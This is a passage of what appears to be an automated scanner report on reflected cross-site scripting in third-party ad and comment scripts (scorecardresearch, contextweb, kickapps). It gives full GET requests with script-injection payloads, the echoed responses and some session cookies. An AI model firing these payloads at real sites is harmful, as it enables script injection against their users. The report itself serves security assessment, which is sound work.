20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"1b888<script>alert(1)</script>766fa601906", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7ff5d<script>alert(1)</script>d1dbf6139c2 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=7ff5d<script>alert(1)</script>d1dbf6139c2&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"7ff5d<script>alert(1)</script>d1dbf6139c2", c6:"", c10:"", c15:"", c16:"", r:""});



1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b35d1<script>alert(1)</script>a08224be487 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6=b35d1<script>alert(1)</script>a08224be487 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"", c6:"b35d1<script>alert(1)</script>a08224be487", c10:"", c15:"", c16:"", r:""});



1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 161ef'%3balert(1)//69af9548b0 was submitted in the admeld_adprovider_id parameter. This input was echoed as 161ef';alert(1)//69af9548b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8161ef'%3balert(1)//69af9548b0&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:45 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 189
Date: Mon, 11 Apr 2011 16:31:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8161ef';alert(1)//69af9548b0&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');

1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1900b'%3balert(1)//92af6dcc53a was submitted in the admeld_callback parameter. This input was echoed as 1900b';alert(1)//92af6dcc53a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match1900b'%3balert(1)//92af6dcc53a HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:47 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Mon, 11 Apr 2011 16:31:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match1900b';alert(1)//92af6dcc53a?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');

1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the as request parameter is copied into a JavaScript rest-of-line comment. The payload 67904%0aalert(1)//1bfa9df98ab was submitted in the as parameter. This input was echoed as 67904
alert(1)//1bfa9df98ab
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=6297667904%0aalert(1)//1bfa9df98ab&lSize=4&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:20 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 1003

//http://serve.a-feed.com/service/getFeed.kickAction?as=6297667904
alert(1)//1bfa9df98ab
&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
/**
Array
(
[url] => http://cdnse
...[SNIP]...

1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the divName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f338'%3balert(1)//2266b1d758d was submitted in the divName parameter. This input was echoed as 7f338';alert(1)//2266b1d758d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4&divName=kickapps_mostcommented7f338'%3balert(1)//2266b1d758d&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:42 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 889

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
var title_container = document.getElementById('kickapps_mostcommented7f338';alert(1)//2266b1d758d');
if (title_container!=null){
   title_container.innerHTML='<span id="ka_article_titles">
...[SNIP]...

1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the lSize request parameter is copied into a JavaScript rest-of-line comment. The payload a6a6a%0aalert(1)//8cda9d9ad91 was submitted in the lSize parameter. This input was echoed as a6a6a
alert(1)//8cda9d9ad91
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4a6a6a%0aalert(1)//8cda9d9ad91&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:33 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 14087

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4a6a6a
alert(1)//8cda9d9ad91
&fromDate=04-06-2011
/**
Array
(
[url] => ht
...[SNIP]...

1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8676a'%3balert(1)//8c88e991541 was submitted in the dName parameter. This input was echoed as 8676a';alert(1)//8c88e991541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=8676a'%3balert(1)//8c88e991541&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:27 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
place holder in case you need to check domain hosting js
   return true;
}

function ka_start() {
   if (!ka_verifyDomain()){
   }
   else {
       var comment_content_container = document.getElementById('8676a';alert(1)//8c88e991541');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "867
...[SNIP]...

1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2f2f"%3balert(1)//db5a3dbef58 was submitted in the dName parameter. This input was echoed as f2f2f";alert(1)//db5a3dbef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=f2f2f"%3balert(1)//db5a3dbef58&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:24 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
f58');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "f2f2f";alert(1)//db5a3dbef58");
    bod.appendChild(comments);
       }
       ka_writeContainer();
       var commentsAdd = document.getElementById('ka_orig_button');
if (commentsAdd == null) {
var bo
...[SNIP]...

1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53a11'%3balert(1)//ce95be82201 was submitted in the id parameter. This input was echoed as 53a11';alert(1)//ce95be82201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html53a11'%3balert(1)//ce95be82201&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:58 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 89133

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html53a11%27%3Balert%281%29%2F%2Fce95be82201";
var ka_adminUser = 'wptz';
var ka_commentsLis
...[SNIP]...
acebook.get_sessionState().waitUntilReady(function() {
var attachment = {'name':'Guard Prepares For Possible Federal Shutdown','href':'http://www.wptz.com/news/27483035/detail.html53a11';alert(1)//ce95be82201','description':commentText,'caption':'{*actor*} commented on this article.'};
FB.Connect.streamPublish(noQuoteText, attachment, null, null,'',null);
});

...[SNIP]...

1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the pSize request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2660d%3balert(1)//b550bd280e9 was submitted in the pSize parameter. This input was echoed as 2660d;alert(1)//b550bd280e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

